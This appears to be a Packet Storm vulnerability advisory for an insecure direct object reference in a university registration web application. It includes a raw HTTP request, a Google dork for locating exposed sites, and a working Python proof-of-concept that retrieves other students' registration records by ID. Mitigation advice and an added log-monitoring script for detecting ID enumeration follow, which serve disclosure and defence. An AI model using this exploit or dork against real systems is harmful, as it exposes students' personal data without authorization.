
University Registration System 1.0 Insecure Direct Object Reference

27 Mar 2025 | Reported by wa0_3, td9_l | Type: packetstorm | Source: packetstorm.news

Insecure Direct Object Reference in University Registration System allows unauthorized data access.

Code
    # Exploit Title: University Registration System - IDOR Leads to Information Disclosure
    # Date: 2025-03-25
    # Exploit Author: wa0_3/td9_l
    # Telegram: @wa0_3/@td9_l
    # Vendor Homepage: https://informatique-eg.com/
    # Version: 1.0
    # Tested on: https://demo.informatique-eg.com/
    # Category: WebApps
    # CVE: N/A
    
    ## Description:
    An Insecure Direct Object Reference (IDOR) vulnerability was discovered in the University Registration System, allowing unauthorized users to access and modify registration details of other students by manipulating the `paramPgregistrationId` parameter.
    
    ## Vulnerable Endpoint:
    ```
    GET /Registration/PG/PG_Register.aspx?paramPgregistrationId=(id) HTTP/1.1
    Host: target-university.edu
    Cache-Control: max-age=0
    Accept-Language: en-US,en;q=0.9
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Cookie: ASP.NET_SessionId=gky2cc33uoduykncb5mrz5e3
    Connection: keep-alive
    ```
    
    ## Google Dork:
    ```
    inurl:Registration/PG/PG_Register.aspx
    ```
    
    ## Proof of Concept (PoC):
    ```python
    import argparse
    import requests
    
    parser = argparse.ArgumentParser(description='Exploit IDOR in University Registration System')
    parser.add_argument('-url', help='Target base URL, with trailing slash (e.g., http://example.com/)', required=True)
    parser.add_argument('-id', help='Target Registration ID', required=True)
    args = parser.parse_args()
    
    url = f"{args.url}Registration/PG/PG_Register.aspx?paramPgregistrationId={args.id}"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate, br",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "keep-alive"
    }
    
    response = requests.get(url, headers=headers)
    
    if response.status_code == 200:
        print("[+] Exploit Successful!")
        print("[+] Response:")
        print(response.text)
    else:
        print("[-] Exploit Failed")
    ```
    
    ## Impact:
    An attacker can enumerate `paramPgregistrationId` values to view and potentially modify sensitive student registration details without authentication.
    
    ## Mitigation:
    - Implement proper access control checks to ensure only authorized users can access their own data.
    - Use session-based authentication to verify user privileges before serving sensitive data.
    - Implement rate limiting and monitoring to detect abnormal access patterns.
    
    ## Credits:
    Discovered by **wa0_3** (@wa0_3)
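
The monitoring mitigation listed above can be prototyped over web server access logs. This is an added example, not part of the original advisory or the vendor's code: it counts the distinct `paramPgregistrationId` values each client requests on the advisory's endpoint and flags clients above a threshold. The IIS W3C field layout, the sample log lines and the threshold are constructed assumptions.

```python
from collections import defaultdict
from urllib.parse import parse_qsl

ENDPOINT = "/registration/pg/pg_register.aspx"  # path from the advisory, lower-cased
PARAM = "parampgregistrationid"                 # parameter from the advisory, lower-cased

# Constructed sample in IIS W3C format; the field layout is an assumption.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2025-03-25 10:00:01 192.0.2.10 GET /Registration/PG/PG_Register.aspx paramPgregistrationId=1041 200
2025-03-25 10:00:09 192.0.2.10 GET /Registration/PG/PG_Register.aspx paramPgregistrationId=1041 200
2025-03-25 10:01:02 198.51.100.7 GET /Registration/PG/PG_Register.aspx paramPgregistrationId=1001 200
2025-03-25 10:01:03 198.51.100.7 GET /registration/pg/pg_register.aspx PARAMPGREGISTRATIONID=1002 200
2025-03-25 10:01:03 198.51.100.7 GET /Registration/PG/PG_Register.aspx paramPgregistrationId=1003 200
2025-03-25 10:01:04 198.51.100.7 GET /Registration/PG/PG_Register.aspx paramPgregistrationId=1004 302
2025-03-25 10:01:05 198.51.100.7 GET /Default.aspx - 200
"""

def registration_ids_by_client(log_text):
    """Map client IP -> set of distinct registration IDs it requested."""
    fields, seen = [], defaultdict(set)
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names declared by the log header
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-uri-stem", "").lower() != ENDPOINT:
            continue
        # Match path and key case-insensitively so case variants are not missed.
        for key, value in parse_qsl(row.get("cs-uri-query", "")):
            if key.lower() == PARAM:
                seen[row.get("c-ip", "unknown")].add(value)
    return seen

def flag_enumeration(log_text, max_distinct_ids=2):
    """Return {client_ip: sorted IDs} for clients above the (assumed) threshold."""
    return {ip: sorted(ids)
            for ip, ids in registration_ids_by_client(log_text).items()
            if len(ids) > max_distinct_ids}

if __name__ == "__main__":
    for ip, ids in flag_enumeration(SAMPLE_LOG).items():
        print(f"{ip} requested {len(ids)} distinct registration IDs: {ids}")
```

In production the grouping key would normally be the authenticated session or account rather than the client IP, and the count would be evaluated over a time window.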
